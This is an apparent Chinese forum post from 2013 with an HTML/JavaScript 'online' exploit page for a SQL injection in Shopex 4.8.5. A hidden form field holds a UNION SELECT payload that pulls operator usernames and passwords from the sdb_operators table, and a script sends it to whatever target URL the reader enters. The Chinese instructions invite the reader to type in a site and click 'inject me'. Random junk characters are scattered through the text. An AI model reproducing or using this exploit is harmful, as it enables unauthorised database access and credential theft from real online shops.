<center>
( K) {% K5 S6 Z) b. q1 X, k<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
; Q2 O: N% Z1 e# o# }<form action="" method="post" name="submit_url">6 F% V7 M7 W: p3 b" K0 g( s: `4 y
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
+ w7 i3 m4 C X" W$ Z<input type="hidden" name="goods[goods_id]" value="3">- v F/ r! {7 h6 V! f* Q& M
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
# V8 e& `/ |" U8 j' @% c- ]. Y<input type="submit" value="给我注入" onclick=fsubmit()>" |' T& |+ w: I( I7 F
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
9 R: q/ K) F: m7 y* ] w/ P' k @
$ h7 i# n$ x1 ^* G; u- j" G6 ~5 t<script> " K( T- W% t0 n3 x$ i2 T
function fsubmit(){
$ G* z8 m2 a& k( Pform = document.forms[0];
9 ^* U1 A; e2 I& t& Z9 ]form.action = form.url.value+'/?product-gnotify'; ) @, O8 a' q/ z7 V& D& ^5 M
form.submit();
% A8 \! \- w: R e8 l}
5 m3 `+ z* W* Q. d# p* m</script>' ~" Y" B0 d- C, d5 r1 H7 b
|
发表于 2013-1-23 09:20:52
收藏
支持
反对